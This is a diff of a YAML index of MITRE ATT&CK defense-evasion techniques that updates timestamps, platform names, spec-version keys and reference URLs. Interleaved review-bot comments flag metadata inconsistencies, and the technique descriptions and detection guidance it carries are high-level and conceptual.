- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5482,7 +5618,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
@@ -5575,7 +5712,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5694,16 +5833,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5752,14 +5887,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
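Review bot: the STIX `spec_version: '2.1'` key is removed here and from every other object this diff touches, never re-added, while `x_mitre_attack_spec_version` is bumped 3.1.0 to 3.2.0 in place. A uniform removal like this is a generator or export-format change rather than per-object data and should be called out in the commit message, and any consumer of this index that reads `spec_version` needs to be checked. The `modified` bump for T1078.001 to 2024-10-14 is consistent with a 3.2.0 re-export.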
@@ -5774,6 +5908,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
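Review bot: `Azure AD`, `Office 365` and `Google Workspace` are replaced by `Office Suite` and `Identity Provider` in `x_mitre_platforms`, with `x_mitre_version` 1.3 to 1.4; the same substitution recurs for T1548 and T1548.005, and partially for T1070 (Office Suite only, since it listed no Azure AD). Any index, filter or coverage report in this repo that keys on the old platform strings will stop matching these techniques and should be updated in the same change. The `x_mitre_modified_by_ref` insertion here pairs with its removal at the bottom of the object in the next hunk; it is a reorder, not a duplicate.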
@@ -5825,14 +5960,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
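Review bot: the `modified` timestamp for T1574.006 moves backwards, 2023-05-09 to 2023-03-30, and the same regression appears in this diff for T1222, T1134.002, T1548.001, T1218.008, T1055.013, T1574.005, T1036.002, T1542.002, T1055.004, T1647, T1600.002, T1612, T1055.002 and T1218.012. Every old value shares the `.188Z` millisecond suffix (a locally stamped release time), while the new values carry distinct full-precision times that look like the upstream STIX `modified` field. If the intent is that `modified` now mirrors upstream, state that in the commit message, because anything that sorts or diffs by this field will now see these techniques as older than before.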
@@ -5953,7 +6085,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -6271,12 +6398,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
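Review bot: for T1218.008 this hunk removes `x_mitre_attack_spec_version: 2.1.0` along with `spec_version`, and nothing in the hunk adds a replacement, unlike the objects above where the key is bumped to 3.2.0 in place. The same pair disappears for T1055.013, T1574.005, T1036.002, T1542.002, T1055.004, T1600.002 and T1055.002. Confirm the key is re-added earlier in each of these objects (as it is for T1578.003 and T1497, which get 3.2.0 in their re-added tail), or document that these 2.1.0-era entries now carry no spec version, since consumers that assume the key is present on every technique will break.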
@@ -6470,10 +6593,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -6531,7 +6653,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
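Review bot: the removals in this hunk (platforms, domains, object_marking_refs, id, type, created, created_by_ref, all four external references and `modified`) are a key reorder for T1578.003, with the same content re-added lower in the object by the following hunk, which makes the real changes hard to spot by reading the hunks. Compare the sorted key sets of the two versions instead: the substantive changes are the new `modified` of 2024-09-30 and, in the re-added block, the Mandiant URL, the CISA contributor and the new `revoked` and `x_mitre_deprecated` keys.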
@@ -6675,20 +6765,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
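Review bot: the Mandiant M-Trends 2020 reference changes its URL to the `mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` path but keeps `Retrieved April 24, 2020`, a date that predates the 2021-09 upload directory; the harmj0y entries earlier in this diff refresh the retrieved date together with the URL, so do the same here. Separately, `x_mitre_permissions_required: - User` is dropped for T1578.003 with no replacement, while T1218.008 and T1055.002 keep theirs as unchanged context in this diff; confirm this reflects the upstream object and is not an accidental loss.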
@@ -6718,7 +6838,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
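Review bot: unchanged context, but the Stefan Kanthak reference for T1574.005 reads `(2015, December 8)` with `Retrieved December 4, 2014`, a retrieval date a year before the cited post was published. Since this diff is already correcting retrieved dates for other references, fix this one in the same pass.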
@@ -6753,8 +6873,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
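Review bot: the rewritten T1562.007 description ends with `[Endpoint Denial of Service](...). "`, a trailing space inside the quoted scalar before the closing quote, which will surface in any rendered output and is the only description in this diff with one. The paragraph also cites `Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` twice within three sentences, the second time alongside Expel IO Evil in AWS. If the text is mirrored verbatim from upstream ATT&CK, both are upstream issues to report rather than patch locally. On substance, the new wording scopes the technique to an adversary `with appropriate permissions` and adds control-plane to data-plane lateral movement; the unchanged detection guidance (monitor cloud logs for new or modified security groups and firewall rules) still covers that case.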
@@ -6879,7 +7002,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
